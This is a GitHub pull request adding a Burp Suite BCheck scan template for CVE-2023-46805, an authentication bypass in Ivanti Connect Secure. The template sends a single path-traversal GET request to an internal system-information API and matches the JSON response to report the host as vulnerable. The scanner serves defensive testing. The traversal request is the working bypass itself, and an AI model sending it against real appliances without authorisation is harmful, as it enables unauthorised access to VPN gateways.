Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2023-46805 - Ivanti Connect Secure Authentication Bypass. #173

Merged
merged 1 commit into from
Feb 5, 2024
Merged
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
27 changes: 27 additions & 0 deletions vulnerabilities-CVEd/CVE-2023-46805-Ivanti Auth Bypass.bcheck
Original file line number Diff line number Diff line change
@@ -0,0 +1,27 @@
# https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/
# https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis

metadata:
language: v2-beta
name: "CVE-2023-46805 - Ivanti Connect Secure and Ivanti Policy Secure Authentication Bypass"
description: "Checks for CVE-2023-46805"
author: "trikster"
tags: "CVE-2023-46805", "cve", "auth-bypass", "ivanti"


given host then
send request called check:
method: "GET"
path: "/api/v1/totp/user-backup-code/../../system/system-information"

if {check.response.status_code} is "200" and
"Content-Type: application/json" in {check.response.headers} and
{check.response.body} matches "(?m)\s*\{\s*\"software-inventory\"\s*:\s*\{\s*\"software\"\s*:\s*\{\s*\"name\"\s*:\s*\"\w+\"" then

report issue:
severity: high
confidence: firm
detail: "Application appears to be vulnerable to CVE-2023-46805."
remediation: "Apply vendor patches."

end if
Loading